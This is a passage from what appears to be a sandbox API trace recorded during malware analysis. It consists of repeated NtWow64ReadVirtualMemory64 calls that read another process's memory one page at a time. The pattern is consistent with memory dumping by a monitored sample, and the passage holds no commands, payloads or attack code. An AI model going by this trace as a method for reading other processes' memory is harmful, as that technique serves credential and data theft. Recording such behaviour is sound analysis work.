[0144.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xabd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xabe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xabf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xac0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.642] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xac1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xac2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xac3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xac4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xac5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.643] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xac6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xac7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xac8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xac9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.644] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xaca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xacb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xacc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xacd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.645] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xace000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xacf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xad0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xad1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.646] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xad2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xad3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xad4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xad5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.647] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xad6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xad7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xad8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xad9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xada000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.648] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xadb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xadc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xadd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xade000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.649] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xadf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xae0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xae1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xae2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xae3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.650] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xae4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xae5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xae6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xae7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.651] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xae8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xae9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xaea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xaeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xaec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.652] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xaed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xaee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xaef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xaf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.653] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xaf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xaf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xaf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.654] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xaf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xaf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xaf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xaf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xaf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.655] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xaf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xafa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xafb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.656] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xafc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xafd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xafe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xaff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xb00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.657] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xb01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xb02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xb03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.658] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xb04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xb05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xb06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xb07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.659] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xb08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xb09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.660] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xb0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xb0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xb0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.661] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xb0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xb0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xb0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xb10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.662] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xb11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xb12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xb13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xb14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xb15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.663] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xb16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.664] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xb17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xb18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xb19000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xb1a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xb1b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.665] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xb1c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xb1d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xb1e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.666] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xb1f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xb20000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xb21000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.667] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xb22000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xb23000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xb24000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xb25000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.668] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xb26000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xb27000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.669] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xb28000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xb29000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xb2a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xb2b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xb2c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.670] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xb2d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.671] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xb2e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 